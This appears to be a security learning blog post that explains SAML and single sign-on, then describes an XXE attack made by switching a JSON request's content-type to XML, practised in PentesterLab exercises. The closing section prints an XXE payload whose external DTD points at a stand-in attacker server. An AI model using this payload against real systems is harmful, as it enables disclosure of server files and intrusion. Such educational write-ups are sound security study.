Day 41 comes with Security Assertion Markup Language (SAML) and XXE in POST Request Allowing XML and JSON in their Responses!
Security Assertion Markup Language (SAML)
From Rajesh Ranjan. Security Assertion Markup Language, or SAML, is a standardized way to tell external applications and services that a user is who they say they are. SAML makes single sign-on (SSO) technology possible by providing a way to authenticate a user once and then communicate that authentication to multiple applications. The most current version of SAML is SAML 2.0 What is single sign-on (SSO)? Single sign-on (SSO) is a way for users to be authenticated for multiple applications and services at once. With SSO, a user signs in at a single login screen and can then use a number of apps. Users do not need to confirm their identity with every single service they use The implementation of SSO is easy if multiple services are located under the same parent domain. Like these two versions of Facebook
These two services are located on the same domain, facebook.com. In this case, SSO can be easily achieved by sharing cookies across subdomains
Set-Cookie: cookie=abc123; Domain=facebook.com; Secure; HttpOnly
However, cookies cannot be shared across different domains. So Facebook.com and Messenger.com cannot share cookies, because they don’t share a common parent domain And this is where SAML comes into play.
How does SAML work?
A typical SSO authentication process involves these three parties:
- Principal (also known as the “subject”)
- Identity provider
- Service provider
Principal/subject: This is almost always a human user who is trying to access a cloud-hosted application.
Identity provider: An identity provider (IdP) is a cloud software service that stores and confirms user identity, typically through a login process. Essentially, an IdP’s role is to say, “I know this person, and here is what they are allowed to do.
Service provider: This is the cloud-hosted application or service the user wants to use. Common examples include cloud email platforms such as Gmail and Microsoft Office 365, cloud storage services such as Google Drive and AWS S3, and communications apps such as Slack and Skype.
A Basic workflow of SAML is represented below
XXE in POST Request Allowing XML and JSON in their Responses
Therefore it came pretty interesting to me that in different place where users are allowed to insert certain input in where the request
content-type is JSON, it was possible to change the
content-type and insert XML instead. During couple exercises from pentesterlab, it went successful by crafting the following payload in the request.
<?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://youserver.tdt/test.dtd"> <foo>&e1;</foo>
Take in mind that thing such as
&e1; must change depending in the request input, and the parameters required in order to have a successful post request. Take in mind that part of the success of this attack depends also in certain tokens that the request might have, if the request has a token, the attack might not be successful.